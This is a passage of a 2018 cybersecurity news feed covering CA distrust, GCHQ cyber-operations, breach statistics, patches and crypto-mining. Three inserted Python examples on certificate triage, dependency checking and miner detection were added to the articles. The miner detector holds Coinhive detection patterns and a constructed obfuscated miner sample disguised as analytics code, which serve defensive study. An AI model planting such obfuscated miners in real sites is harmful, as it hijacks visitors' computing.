Info Security


Google Will Distrust Additional CAs, IT Pros Predict

Thu, 04/12/2018 - 19:07

Although IT security professionals are troubled by future certificate authority (CA) incidents, very few have the tools needed to switch CAs quickly.

The finding is significant given that, last year, Google's Chrome team concluded that Symantec and the CAs operating under its roots had mis-issued thousands of Transport Layer Security (TLS) certificates, and announced a formal plan to phase out trust in Symantec-issued certificates. The first deadline is April 17, 2018, when Chrome 66 stops trusting Symantec TLS certificates issued before June 1, 2016; Mozilla is following a parallel timeline for Firefox.

A study from Dimensional Research, which included responses from 1,100 IT security professionals, found that just 15% of respondents believe that Google's decision to distrust Symantec certificates is a one-time event. However, if they were affected by a major CA event, only 23% said they are completely confident in their ability to quickly find and replace all of their impacted certificates.

"CAs have a very difficult job and they deal with many complexities that are outside their control," said Mike Dodson, global head of solution architects for Venafi, which sponsored the report. "Every CA is exposed to risks; and CA compromises and errors can leave organizations scrambling to find and replace many certificates in a short amount of time. Organizations need greater control over the CAs they trust, but they also must acknowledge that they'll never have full control. For example, browsers play a big role in how we trust CAs. Chrome and Mozilla recently decided they would no longer trust certificates issued by Symantec, and now many organizations must replace these certificates before a set deadline."

Additional findings indicate that security professionals may be over-estimating their ability to respond to a CA incident: 61% of the respondents say they have a plan in place that would allow them to replace all Symantec certificates by the upcoming deadlines, but only 58% have an accurate inventory that includes the IP address of all devices where certificates that chain up to a Symantec root were installed.

Similarly, nearly two-thirds (62%) are confident they don't have certificates from unauthorized CAs, but only half have controls in place to detect this. Also, three-quarters (74%) believe they can find and replace all certificates affected by a CA compromise quickly, but only 8% have automated processes in place.
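The two gaps the survey describes, knowing which certificates chain to a distrusted root and catching certificates from CAs that were never approved, come down to a query over a certificate inventory. The following is an added example, not code from the article or from Venafi: it assumes an inventory export with one record per (host, IP, certificate) carrying the leaf's issuer DN, the organisation of the root the chain ends in, the notBefore date and a SHA-256 fingerprint, and it buckets each certificate by the Chrome 66 phase-1 rule (issued before June 1, 2016) and by an approved-issuer list. The brand list, the sample records, fingerprints and DNs are all constructed for the example.

```python
"""Triage a TLS certificate inventory after a CA distrust announcement.

Added example, not from the article or from Venafi. Assumes an inventory
export with one record per (host, IP, certificate). The sample records,
fingerprints and DNs below are constructed.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import date

# Brands that sat under the legacy Symantec PKI (an assumption for this
# example; a production check matches root fingerprints, not names).
DISTRUSTED_ROOT_BRANDS = ("symantec", "verisign", "thawte", "geotrust", "rapidssl")
FIRST_PHASE_CUTOFF = date(2016, 6, 1)   # Chrome 66 distrusts certs issued before this


@dataclass(frozen=True)
class CertRecord:
    host: str
    ip: str
    fingerprint: str     # SHA-256 of the leaf, so one cert on many hosts is one job
    issuer_dn: str       # leaf issuer DN, e.g. "C=US, O=Example CA, CN=Example Issuing CA"
    root_org: str        # O= of the root the chain terminates in
    not_before: date


def dn_component(dn, key):
    """Value of the first `key=` attribute in a comma-separated DN, or ""."""
    for part in dn.split(","):
        k, _, v = part.strip().partition("=")
        if k.strip().upper() == key.upper():
            return v.strip()
    return ""


def chains_to_distrusted_root(rec):
    org = rec.root_org.lower()
    return any(brand in org for brand in DISTRUSTED_ROOT_BRANDS)


def distrust_phase(rec):
    """'blocked': chains to the distrusted CA and was issued before the
    phase-1 cutoff, so Chrome 66 rejects it; 'pending': chains to it but
    falls under a later deadline; 'ok': unaffected."""
    if not chains_to_distrusted_root(rec):
        return "ok"
    return "blocked" if rec.not_before < FIRST_PHASE_CUTOFF else "pending"


def triage(records, approved_issuer_orgs):
    """Group by fingerprint so each certificate is one replacement job that
    lists every (host, IP) it is installed on, then bucket it."""
    by_cert = defaultdict(list)
    for r in records:
        by_cert[r.fingerprint].append(r)
    report = {"blocked": [], "pending": [], "unauthorized": []}
    for fp, recs in by_cert.items():
        first = recs[0]
        locations = sorted({(r.host, r.ip) for r in recs})
        phase = distrust_phase(first)
        if phase != "ok":
            report[phase].append((fp, locations))
        # Issuer not on the approved list: a rogue or shadow-IT CA.
        if dn_component(first.issuer_dn, "O") not in approved_issuer_orgs:
            report["unauthorized"].append((fp, locations))
    return report


# Constructed sample inventory: four certificates on five endpoints.
SAMPLE_INVENTORY = [
    CertRecord("www.example.com", "203.0.113.10", "sha256:a1a1",
               "C=US, O=Symantec Corporation, CN=Example Symantec Issuing CA",
               "Symantec Corporation", date(2015, 3, 10)),
    CertRecord("www.example.com", "203.0.113.11", "sha256:a1a1",
               "C=US, O=Symantec Corporation, CN=Example Symantec Issuing CA",
               "Symantec Corporation", date(2015, 3, 10)),
    CertRecord("api.example.com", "203.0.113.20", "sha256:b2b2",
               "C=US, O=GeoTrust Inc., CN=Example GeoTrust Issuing CA",
               "GeoTrust Inc.", date(2017, 1, 5)),
    CertRecord("mail.example.com", "203.0.113.30", "sha256:c3c3",
               "O=Example Internal CA, CN=Example Issuing CA",
               "Example Internal CA", date(2017, 7, 1)),
    CertRecord("vpn.example.com", "203.0.113.40", "sha256:d4d4",
               "C=US, O=DigiCert Inc, CN=Example DigiCert Issuing CA",
               "DigiCert Inc", date(2017, 9, 12)),
]
APPROVED_ISSUER_ORGS = {"Symantec Corporation", "GeoTrust Inc.", "DigiCert Inc"}

if __name__ == "__main__":
    for bucket, items in triage(SAMPLE_INVENTORY, APPROVED_ISSUER_ORGS).items():
        for fp, locations in items:
            print(f"{bucket:12} {fp} installed on {locations}")
```

Grouping by fingerprint is what turns "we have a plan" into a work queue: the same certificate on two load balancers is one reissue but two deployments, and the IP list is exactly the inventory item 42% of respondents said they lack.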

Categories: Cyber Risk News

UK Launches Offensive Cyber-Weapons Against Islamic State

Thu, 04/12/2018 - 19:00

The GCHQ, in partnership with the Ministry of Defence, has conducted a major offensive cyber-campaign against Daesh, aka the Islamic State/ISIS terror group. This marks the first time the UK has systematically and persistently attacked an adversary’s online efforts as part of a wider military campaign, according to the new GCHQ director, Jeremy Fleming.

“These operations have made a significant contribution to coalition efforts to suppress Daesh propaganda, hindered their ability to coordinate attacks, and protected coalition forces on the battlefield,” the former MI5 deputy director general said, speaking at the UK cybersecurity showcase CYBERUK 2018. “The outcomes of these operations are wide-ranging. We may look to deny service, disrupt a specific online activity, deter an individual or a group or perhaps even destroy equipment and networks.”

He said that the operation was hugely successful, noting that in 2017 there were times when Daesh members found it “almost impossible to spread their hate online, to use their normal channels to spread their rhetoric or trust their publications.”

The campaign, which shows how targeted and effective offensive cyber-attacks can be, is part of a wider effort that also includes the efforts by service providers to remove Daesh material from their sites.

Offensive cyber-capabilities have been controversial, both in the UK and across the globe, with detractors noting that should these weapons fall into the wrong hands, as happened when NSA exploits such as EternalBlue were leaked, the damage could be catastrophic.

“We know that these capabilities are very powerful,” said Fleming. “The international doctrine governing their use is still evolving. And as with all of our work we only use them in line with domestic and international law, when our tests of necessity and proportionality have been satisfied, and with all the usual oversight in place.”

Categories: Cyber Risk News

Developers Failing to Use Secure Open Source Components

Thu, 04/12/2018 - 09:40

Only half of developers using open source components in their software update them to use the most secure version, according to CA Veracode.

The security firm polled 400 app developers from the UK, US and Germany and found just 52% update these components when a new vulnerability is announced.

This could be exposing organizations to serious risks, given the ubiquity of third-party components in modern code. The research revealed that 83% of respondents use commercial and/or open source components, with an average of 73 used per application.

Component reuse is standard practice in DevOps shops because it accelerates time-to-market and improves efficiency, but every imported component also imports its known and future vulnerabilities into the code base.

Some 71 vulnerabilities per application are introduced on average through use of third-party components, with only 23% of respondents claiming they test for bugs in components at every release.
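Testing components "at every release" means re-checking the declared versions against the current advisory feed, not only when a developer happens to hear of a new bug. The following is an added example, not CA Veracode's or Sonatype's tooling: a minimal software-composition check that matches a manifest against affected-version ranges and proposes an upgrade target that is not itself inside another advisory's range (a naive "bump to the fixed version" can land on a release a second advisory covers). Package names, versions and advisory IDs are constructed placeholders; a real run would pull advisories from a vulnerability database and versions from the project's lockfile.

```python
"""Check a dependency manifest against known-vulnerable version ranges.

Added example, not CA Veracode's or Sonatype's tooling. The advisory feed
and manifest below are constructed placeholders.
"""
from dataclasses import dataclass


def parse_version(text):
    """'1.4.2' -> (1, 4, 2). Each segment's numeric prefix is used and a
    trailing qualifier is ignored, so '1.4.2-rc1' -> (1, 4, 2)."""
    parts = []
    for seg in text.split("."):
        digits = ""
        for ch in seg:
            if not ch.isdigit():
                break
            digits += ch
        parts.append(int(digits) if digits else 0)
    return tuple(parts)


def version_lt(a, b):
    """Numeric comparison with zero padding: 1.4 == 1.4.0 and 1.4.9 < 1.4.10."""
    pa, pb = parse_version(a), parse_version(b)
    width = max(len(pa), len(pb))
    pa += (0,) * (width - len(pa))
    pb += (0,) * (width - len(pb))
    return pa < pb


@dataclass(frozen=True)
class Advisory:
    advisory_id: str
    package: str
    introduced: str   # first affected version (inclusive)
    fixed: str        # first fixed version (exclusive upper bound)

    def affects(self, version):
        return not version_lt(version, self.introduced) and version_lt(version, self.fixed)


def affecting(advisories, package, version):
    return [a for a in advisories if a.package == package and a.affects(version)]


def upgrade_target(advisories, package, version):
    """Lowest version clear of every advisory for the package: step to the
    highest 'fixed' among advisories hitting the current candidate and
    repeat until nothing applies."""
    candidate = version
    while True:
        hits = affecting(advisories, package, candidate)
        if not hits:
            return candidate
        candidate = max((a.fixed for a in hits), key=parse_version)


def check_manifest(manifest, advisories):
    """manifest: {package: version}. Returns one finding per vulnerable package."""
    findings = []
    for package, version in sorted(manifest.items()):
        hits = affecting(advisories, package, version)
        if hits:
            findings.append({
                "package": package,
                "version": version,
                "advisories": [a.advisory_id for a in hits],
                "upgrade_to": upgrade_target(advisories, package, version),
            })
    return findings


# Constructed advisory feed and manifest (placeholder names and IDs).
ADVISORIES = [
    Advisory("ADV-0001", "webparser", "1.0.0", "1.4.2"),
    Advisory("ADV-0002", "webparser", "1.4.0", "1.5.1"),   # also covers 1.4.2, ADV-0001's fix
    Advisory("ADV-0003", "authlib", "2.0.0", "2.3.0"),
]
MANIFEST = {"webparser": "1.2.0", "authlib": "2.4.0", "libfoo": "0.9.7"}

if __name__ == "__main__":
    for f in check_manifest(MANIFEST, ADVISORIES):
        print(f"{f['package']} {f['version']}: {', '.join(f['advisories'])} -> upgrade to {f['upgrade_to']}")
```

The version comparison deliberately ignores pre-release qualifiers; if a project pins release candidates, the comparison needs a proper semver library rather than this numeric-prefix rule.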

“We know that developers care about creating great code, and that means creating secure code,” said Pete Chestna, director of developer engagement, CA Veracode. “In order to be successful, developers need to have clarity on the security policy and the tools to measure against it. When the goal is clear and we give developers access to those tools, they are able to integrate scanning earlier into the software development lifecycle and make informed decisions that take security into consideration. Through this, we see a marked improvement in secure software development and the resulting outcomes.”

The findings chime with separate research from Sonatype, which revealed that one in eight open source components downloaded in the UK last year contained vulnerabilities, a 120% year-on-year increase.

The vendor claimed that 80%-90% of every modern application is made up of open source components, but argued that manual processes and a lack of built-in security controls mean many developers are exposing themselves to unnecessary cyber-risk.

Categories: Cyber Risk News

Human Error Dominates as Breached Records Soar 88% in 2017

Thu, 04/12/2018 - 09:16

Around 2.6 billion records were stolen in 2017, an 88% increase on the previous year’s figures, according to Gemalto.

The security firm’s 2017 Breach Level Index Report comprised data from publicly reported breaches around the world.

It revealed the US in first place, accounting for 1,453 such data breaches, while the UK came a distant second with 80. Despite this, the number of records compromised in the UK actually fell, from 54.5 million in 2016 to 33.1 million in 2017.

It predicted that the number of reported breaches will rise sharply next year when the EU General Data Protection Regulation (GDPR) comes into force, mandating breach notification.

“On the face of it, UK organizations’ security and data protection seem to be improving. However, with GDPR on the horizon it’s likely that the total amount of lost data will rise nearer in line with the US, who have had to publicly reveal breaches for a number of years,” claimed Gemalto director of product strategy, Joe Pindar.

The headline figure of 2.6 billion records stolen seems at odds with a recent IBM report, which claimed breaches had fallen by 25% from a high of four billion in 2016. However, a Gemalto spokesperson confirmed to Infosecurity that IBM is likely to have included the Yahoo mega-breaches revealed in 2016 but which actually occurred in preceding years.

Gemalto “only tracks breaches that were disclosed and occurred in any given year,” they said.

Elsewhere the trends seem to tally with IBM and Verizon’s latest DBIR, which revealed human error and internal threats to be a major source of cyber-risk for organizations.

Accidental loss, comprising improper disposal of records, misconfigured databases and other issues, caused the exposure of 1.9 billion records – a 580% increase in the number of compromised records from 2016, according to Gemalto.

As if to confirm the severity of the insider threat, while malicious outsiders (72%) were the leading source of data breaches, these comprised only 23% of all compromised data. On the other hand, accidental loss was the cause of 18% of data breaches, but accounted for 76% of all compromised records.

“Worryingly, for UK organizations, is the number of records being compromised due to accidental loss. Companies are clearly not controlling or even knowing where their sensitive customer data is, so when it comes to complying with key aspects of GDPR like the ‘Right to be Forgotten,’ what hope is there that they will be able to remove customer data from all of their systems?” said Pindar.

“Whilst human error is something that all organizations have to deal with, if it’s not correctly encrypted, data can easily be compromised if it gets into the wrong hands. With just over a month to go, UK businesses don’t have a lot of time to get important points like this right.”

Like Verizon, Gemalto also found healthcare (27%) to be the hardest hit by breaches, followed by financial services (12%), education (11%) and government (11%).

Categories: Cyber Risk News

NCSC: New Categorization Framework Will Improve Cyber-Response

Thu, 04/12/2018 - 08:50

A new cyber-incident categorization framework will help government agencies and law enforcers collaborate and respond to attacks more effectively, the National Cyber Security Centre (NCSC) has announced today.

The GCHQ body made the launch at its flagship conference CYBERUK 2018 in Manchester today.

It said the new framework would expand attack categories from the previous three to six, improving consistency, and ensuring better use of resources and improved collaboration between the likes of the NCSC, National Crime Agency (NCA) and police.

“This is a hugely important step forward in joint working between law enforcement and the intelligence agencies,” said National Police Chiefs' Council lead for cybercrime, Peter Goodman.

“Sharing a common lexicon enables a collaborative understanding of risk and severity that will ensure that we provide an effective, joined-up response. This is good news for the safety of our communities, business and individuals.”

The new framework ranks incidents from category one – a national cyber-emergency requiring immediate cross-government coordination – down to category six – a localized incident on an individual or SME which only requires automated protection advice or a local police response.

The NCSC claimed that any online attack which may have a national impact should be reported to it immediately. According to the new framework that means a category 1-3 incident.

Anything below that “national impact threshold” should be reported to Action Fraud.

The NCA is likely to be involved in most categories of incident except six, whether leading the response or coordinating with local police and regional organized crime units (ROCUs).

The NCSC claimed it has responded to more than 800 “significant” incidents since its inception in October 2016. These are either category two or three according to the new framework, having a serious impact on central or local government, UK essential services, a large proportion of the UK population, the UK economy or a large organization.

“This new framework will ensure we are using the same language to describe and prioritize cyber threats, helping us deliver an even more joined up response,” said NCA deputy director, Ollie Gower.

“I hope businesses and industry will be encouraged to report any cyber-attacks they suffer, which in turn will increase our understanding of the cyber threat facing the UK.”

It’s unclear whether the new framework has come about as a result of the NIS Directive, but the new EU rules introduced from early May will certainly force member state governments to lead a more coordinated and effective response to major cyber-incidents.

Categories: Cyber Risk News

65% of UK CISOs Worried About Global Skills Shortage

Wed, 04/11/2018 - 14:35

A new survey from Bitdefender has revealed that more than half of CISOs worldwide (65% in the UK) are worried about the global skills shortage.

As outlined in CISOs’ Toughest Dilemma: Prevention Is Faulty, yet Investigation Is a Burden, the cybersecurity tech company quizzed 1050 people responsible for purchasing IT security within companies in the US and Europe to explore CISOs’ needs in the prevention-detection-response-investigation era.

The research showed how a lack of visibility, speed and personnel affects the development of stronger security practices in companies, leaving CISOs feeling over-burdened and under-resourced: almost 70% of respondents stated their team is under-resourced and 72% admitted their team had experienced agent and alert fatigue.

What’s more, 50% of CISOs said their organization suffered a breach in the past 12 months, whilst one in six of those did not know how the breach occurred. That concerning trend looks set to continue too, with a quarter of all respondents saying their company is likely to face an ongoing security breach without them knowing it.

“Today’s resource- and skill-constrained IT security teams need an endpoint detection and response (EDR) approach that allows for less human intervention and a higher level of fidelity in incident investigations,” Bitdefender’s VP of enterprise solutions Harish Agastya said. “EDR for everyone can be achieved through a funnel-based approach of prevention-detection-investigation-response, leaving the EDR layer to focus on threats further down the funnel in the unknown or potential threat category, and IT teams to focus solely on the alerts and tasks that are truly significant.”

Speaking to Infosecurity Adrian Davis, director of cybersecurity advocacy for EMEA, (ISC)2 added that the continuing cyber-skills shortage is often portrayed as being caused by a supply-side problem, but recent research indicates it is also a failure of talent retention.

“Part of the solution to this is to realize that cyber-threats are now a key business risk comparable to financial and legal risks and thus make it part of the central risk management strategy, giving cyber professionals a vital role to play and a stronger voice within the organization.

“Organizations must get more creative at recruiting cyber professionals and change their recruitment checklist and interview process to look for attributes and skillsets, rather than previous experience. Recruiting exclusively from people with previous experience not only means failing to diversify the workforce, but it also means fishing in a very shallow pool of talent.”

Categories: Cyber Risk News

Over 20 Critical Microsoft Patches to Apply This Month

Wed, 04/11/2018 - 10:36

Microsoft has fixed 65 vulnerabilities this month, over a third of which are critical and stretch across OS, browser and Office environments.

One of the most important fixes of this month’s security update round was released out-of-band in March. CVE-2018-1038 corrects a kernel memory-mapping flaw introduced by the January Meltdown patches and should be a “top priority” for Windows 7 for x64-based Systems and Windows Server 2008 R2 for x64-based Systems, according to Ivanti director of product management, security, Chris Goettl.

He claimed that critical flaws in the OS, browser and Office would keep admins busy this month.

“There are multiple critical vulnerabilities in the Windows Operating System, Internet Explorer and Edge browsers, and on Office this month,” Goettl explained. “There are a few critical kernel vulnerabilities resolved, several Microsoft graphics and TrueType font driver vulnerabilities resolved and a host of critical browser vulnerabilities resolved.”

Elsewhere, Microsoft flagged an Important-rated SharePoint elevation of privilege bug (CVE-2018-1034) that had been publicly disclosed ahead of this month’s update but has not yet been seen exploited in the wild.

Greg Wiseman, senior security researcher at Rapid7 highlighted an unusual patch for a Microsoft Wireless Keyboard 850 vulnerability.

“CVE-2018-8117 is a security feature bypass vulnerability, where an attacker able to extract the encryption key from a keyboard could then wirelessly send and/or read keystrokes, potentially reading sensitive data such as passwords or issuing malicious commands to a connected system,” he explained.

“At a high level, there's nothing out of the ordinary this month. Unfortunately, that means that the majority of the patched vulnerabilities are once again of the worst variety: Remote Code Execution (RCE).”

Also this month, Microsoft finally removed its AV compliance registry key requirement: the gate that had required antivirus vendors to set a key before Windows Update would deliver the Meltdown/Spectre patches, introduced to prevent BSOD crashes caused by incompatible AV products.

Alongside Microsoft there are the ubiquitous Adobe updates for system administrators to deal with this month.

The firm has patched 19 vulnerabilities in Flash Player, Experience Manager, InDesign, Digital Editions, ColdFusion, and the PhoneGap Push Plugin, six of which are critical.

Categories: Cyber Risk News

Zuckerberg: We're in “Arms Race” with Russian Election Meddlers

Wed, 04/11/2018 - 10:05

Facebook CEO Mark Zuckerberg has claimed the firm is in an arms race with Russian hackers attempting to influence the outcome of elections.

Speaking at a much-anticipated Capitol Hill grilling by senators, the social network’s founder revealed that the firm had launched an investigation into the scandal.

“One of my greatest regrets in running the company is that we were slow in identifying the Russian information operations in 2016,” he told Congress.

“There are people in Russia whose job it is to try to exploit our systems and other internet systems and other systems as well. This is an ongoing arms race. As long as there are people sitting in Russia whose job is it to try to interfere in elections around the world, this is going to be an ongoing conflict.”

Zuckerberg also revealed that Facebook is helping special counsel Robert Mueller’s team with their investigation in election meddling.

As well as Russian interference in the US election, the session of several US senate committees was assembled to quiz the Facebook boss on the Cambridge Analytica scandal, in which data on 87 million users allegedly ended up in the hands of political consulting firm Cambridge Analytica.

Former director of research at the firm, Christopher Wylie, told a House of Commons committee he believes this information enabled Donald Trump to get elected as well as the Vote Leave EU referendum campaign.

Zuckerberg again apologized for the mistakes which led to the data leak: in its terms of service at the time which allowed developers to collect data on users’ Facebook friends and in trusting that Cambridge Analytica had deleted that data, which enabled it to build a “psychological warfare” tool for the targeting of political advertising.

“When we heard back from Cambridge Analytica that they had told us that they weren’t using the data and deleted it, we considered it a closed case,” he told senators. “In retrospect, that was clearly a mistake. We shouldn’t have taken their word for it. We’ve updated our policy to make sure we don’t make that mistake again.”

Categories: Cyber Risk News

Home Secretary Announces Police Crackdown on Dark Web

Wed, 04/11/2018 - 09:25

The home secretary will today announce a new multi-million-pound crackdown on illegal dark web activity, although the plan is light on details.

Speaking at the National Cyber Security Centre’s CYBERUK conference in Manchester today, Amber Rudd is expected to say that the Home Office is releasing £9m to support police efforts at tackling cybercrime.

It’s unclear how much of that will be allocated to policing the dark web, something notoriously difficult thanks to anonymizing tools like Tor.

However, £5m will be spent on establishing dedicated cybercrime units at a regional and local level, with only 30% of forces currently having the capabilities they need, according to the government.

Rudd will describe the dark web as a “platform of dangerous crimes and horrific abuse” in which “a sickening shopping list of services and products are available.”

However, the speech – seen in advance by Infosecurity – is light on details. Where US law enforcers have had breakthroughs in the past it has usually been after criminals made mistakes in the physical world, allowing them to infiltrate networks and catch suspects.

For example, one drug dealer was caught after eagle-eyed postal workers’ suspicions were raised when he handed over dark web packages for delivery, whilst wearing latex gloves.

Rudd claimed the £9m is part of a previously announced £50m dedicated to improving police cybercrime resources in 2018/19. This will include development of a new national training program for police and the criminal justice system, and a £3m Cyber Aware campaign to educate the public and businesses on cybercrime issues.

Although politicians usually focus on paedophile rings and drug dealing marketplaces when they talk about the dark web, it’s also a hotbed for the trade of stolen or breached credentials.

In December, researchers found a trove of 1.4 billion breached credentials on the dark web, the largest of its kind ever found. Then, earlier this year, more researchers found 2.7 million stolen online account log-ins from Fortune 500 employees on a dark web site.

Rudd’s announcement comes after severe austerity-related policing cuts by the government were blamed for the dramatic recent rise in violent crime in the UK.

A leaked Home Office report claimed that the cuts had “likely contributed” to the rise in crime, but Rudd has denied seeing the report.

Categories: Cyber Risk News

#CyberUK18: NSA Claims Attack Tactics Rarely Change

Wed, 04/11/2018 - 08:30

“Every day we’re battling a new cyber-threat, but the more that things change the more that they stay the same.”

Speaking at the CyberUK conference in Manchester, Dave Hogue, technical director of the NSA’s Cybersecurity Threat Operations Center (NCTOC), recalled a 2012 intrusion into US Navy networks that caused over $12m of damage and forced a network to be taken down twice. He contrasted it with the 2017 Equifax breach, in which attackers exploited a known vulnerability for which a patch was available, and which has so far cost over $600m to remediate.

“These two stories, five years apart, are discretionally similar in nature,” he said. “We have sophisticated adversaries using unsophisticated means to cause great damage. In fact, I’ll tell you as the overseer of NSA’s operational teams, we have not responded to a zero-day in over 24 months.

“Adversaries are getting into networks using non-technical means, taking advantage of hardware and software technologies that are not compliant with the latest offerings, and taking advantage of bad security practices such as solutions that are no longer vendor-supported.”

Hogue said that advice and solutions are widely available, such as application whitelisting, two-factor authentication and role-based access controls. “There are a lot of outdated things that are making a comeback,” he said. “How can we get a better focus that the security industry is not conveying? Are we making progress? Probably not.”

Hogue called for a change in paradigm, starting with everyone seeing themselves as part of operations, “as the adversary goes after everything and everyone to achieve their objectives.”

He said that the second part is to be more predictive and preventative, and build layers of defenses to defeat common layers of attack. This includes better collaboration and working to build a picture “that involves working across industry, government and academia sectors to have thorough and sustained campaigns that make it costly for the adversary to operate.”

Categories: Cyber Risk News

Crypto-Mining Spikes 500% on Corporate Networks

Tue, 04/10/2018 - 20:07

The volume of crypto-mining transactions has grown, spiking almost 500% on corporate networks.

Cybersecurity firm Zscaler has blocked more than 2.5 billion crypto-mining attempts in the last six months. The spike, the firm said, is likely tied to the sharp increase in value of cryptocurrency (Bitcoin hit highs above $19,000 in December) and the fact that legitimate sites are adopting crypto-mining as a source of revenue instead of online advertisements.

Cybercriminals are of course also taking advantage of the trend by injecting JavaScript (JS) code into compromised legitimate sites to conduct crypto-mining activities unbeknownst to site owners and visitors. In some cases, malicious advertisements are being leveraged for browser-based crypto-mining activities.

The web-based mining kit known as Coinhive dominates the crypto-miner market, showing the fastest growth and accounting for the vast majority of crypto-miners in the enterprise traffic seen on the Zscaler cloud. The way Coinhive is embedded in websites has evolved over time, the firm said, with numerous compromised sites now using JavaScript obfuscation and disguising the final code as Google Analytics JavaScript.
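Injected miners are detectable in captured page bodies if the scanner looks past the obfuscation layer. The following is an added example, not Zscaler's detection logic: it extracts each script from an HTML document, looks for the Coinhive loader and API calls, decodes the `\xNN` and `String.fromCharCode(...)` escapes that obfuscated copies hide those names behind, and flags scripts that present themselves as Google Analytics while carrying miner indicators or obfuscation markers. The three sample pages, the placeholder site key and the threshold of 16 hex escapes are constructed for the example.

```python
"""Flag browser-based crypto-mining scripts in captured page bodies.

Added example, not Zscaler's detection logic. The sample pages, the
placeholder site key and the hex-escape threshold are constructed.
"""
import re

# Loader file and API names of the Coinhive kit the article describes.
MINER_INDICATORS = ("coinhive.min.js", "CoinHive.Anonymous", "CoinHive.User")
OBFUSCATION_MARKERS = ("eval(", "unescape(", "String.fromCharCode(")
ANALYTICS_HINTS = ("google analytics", "google-analytics", "analytics.js", "gtag(")
HEX_ESCAPE_THRESHOLD = 16   # assumption: this many \xNN escapes in one script is unusual

SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.IGNORECASE | re.DOTALL)
SRC_RE = re.compile(r"""src\s*=\s*["']([^"']+)["']""", re.IGNORECASE)
HEX_RE = re.compile(r"\\x([0-9a-fA-F]{2})")
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+)\)")


def decode_escapes(js):
    """Resolve \\xNN escapes and literal String.fromCharCode(n, n, ...) calls so
    indicators hidden behind them become visible to plain substring matching."""
    js = HEX_RE.sub(lambda m: chr(int(m.group(1), 16)), js)
    js = FROMCHARCODE_RE.sub(
        lambda m: "".join(chr(int(n)) for n in m.group(1).replace(" ", "").split(",") if n),
        js)
    return js


def analyse_script(src, body):
    """Return the list of reasons a script looks like a miner (empty if clean)."""
    reasons = []
    raw = f"{src}\n{body}"
    if any(ind in raw for ind in MINER_INDICATORS):
        reasons.append("miner_indicator")
    elif any(ind in decode_escapes(body) for ind in MINER_INDICATORS):
        reasons.append("miner_indicator_after_decoding")
    if any(marker in body for marker in OBFUSCATION_MARKERS):
        reasons.append("obfuscation_marker")
    if len(HEX_RE.findall(body)) >= HEX_ESCAPE_THRESHOLD:
        reasons.append("hex_escape_run")
    # A script that calls itself analytics is only suspicious if something
    # else already is; the genuine analytics snippet trips none of the above.
    if reasons and any(hint in raw.lower() for hint in ANALYTICS_HINTS):
        reasons.append("analytics_masquerade")
    return reasons


def scan_page(html):
    """One finding per suspicious <script> element, in document order."""
    findings = []
    for index, match in enumerate(SCRIPT_RE.finditer(html)):
        attrs, body = match.group(1), match.group(2)
        src_match = SRC_RE.search(attrs)
        src = src_match.group(1) if src_match else ""
        reasons = analyse_script(src, body)
        if reasons:
            findings.append({"script": index, "src": src, "reasons": reasons})
    return findings


# Constructed sample pages. Raw strings keep the JavaScript escapes literal.
CLEAN_PAGE = r"""<html><head>
<script async src="https://www.google-analytics.com/analytics.js"></script>
<script>
window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date;
ga('create', 'UA-00000-0', 'auto'); ga('send', 'pageview');
</script></head><body>hello</body></html>"""

COINHIVE_PAGE = r"""<html><body>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>var miner = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER'); miner.start();</script>
</body></html>"""

# Same miner, hidden behind hex escapes and fromCharCode, labelled as analytics.
MASQUERADE_PAGE = r"""<html><body>
<script>/* Google Analytics tracking */
var _0x1a=["\x43\x6f\x69\x6e\x48\x69\x76\x65\x2e\x41\x6e\x6f\x6e\x79\x6d\x6f\x75\x73","\x73\x74\x61\x72\x74"];
var k=String.fromCharCode(115,105,116,101,45,107,101,121);
eval("new "+_0x1a[0]+"('"+k+"')."+_0x1a[1]+"()");
</script></body></html>"""

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("coinhive", COINHIVE_PAGE), ("masquerade", MASQUERADE_PAGE)):
        print(name, scan_page(page))
```

The decoding step is what matters operationally: a substring match on `CoinHive.Anonymous` alone misses the hex-escaped copy entirely, while the obfuscation and masquerade checks catch variants whose decoded strings point at a different miner kit.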

The category of domains that were used most for browser-based mining activity include nudity/pornography and streaming media. The average browsing time for users on video-streaming sites tends to be higher, allowing miners to maximize their activity as users stay on these sites to view movies or play games. The professional services and marketing category sites ranked high as well, demonstrating the prevalence of mining activity on corporate networks.

“Enterprise networks are being impacted in various ways,” Zscaler said. “Unwanted and unidentified mining activity inside networks causes increased wear and tear on corporate hardware, as the mining increases CPU cycles. Mining activity also hogs corporate network bandwidth and causes performance issues.”

Categories: Cyber Risk News

Orgs Are Holding Back on Cloud-Based Security

Tue, 04/10/2018 - 19:30

Enterprises are adopting the cloud much faster than their security teams can keep up – and misunderstanding about cloud environments is pervasive.

The 2018 Enterprise Cloud Trends Report from iboss surveyed IT decision makers and office workers in US enterprises and found that 64% of IT decision makers believe the pace of software as a service (SaaS) application adoption is outpacing their cybersecurity capabilities. Combined with growing pressures from shadow IT and mobile employees, 91% of IT decision makers agree they need to update security policies to protect their cloud-first environment.

However, there are also misconceptions when it comes to how much of a threat these challenges are. On average, IT decision makers believe 36% of remote workers bypass security policies; in reality, 48% of office worker respondents admit to bypassing remote work policies and 82% of office workers admit to going around their VPN when working remotely. About 62% of office workers have bypassed the IT department to access a new application, and nearly 80% of IT decision makers believe this type of shadow IT is a major security concern.

The results of the survey also show that approximately half of IT decision makers hesitate to move to cloud-based cybersecurity solutions. The primary concerns they had when evaluating the migration to cloud security were data privacy, cost of maintenance, cost of migration, concerns around legacy infrastructure integration and compliance and data protection regulations.

“This survey clearly shows that large organizations are facing many challenges that can be solved with cloud-based cybersecurity solutions, but they are holding back because of avoidable concerns,” said Paul Martini, CEO and co-founder, iboss. “Office workers are clearly demanding access to SaaS applications and remote work capabilities; the challenge now is to secure them effectively. iboss offers a cloud-based cybersecurity solution that eliminates the need to expose your data to a shared-cloud security service.”

Categories: Cyber Risk News

Organizations Failing at Timely Detection of Threats

Tue, 04/10/2018 - 19:21

Detection and remediation capabilities still need work at most organizations: Less than half of all organizations in a benchmark survey from LogRhythm were able to detect a major cybersecurity incident within one hour. Even more concerning, more than two-thirds said that even if they detected a major incident, they would be unable to contain it within that same time frame.

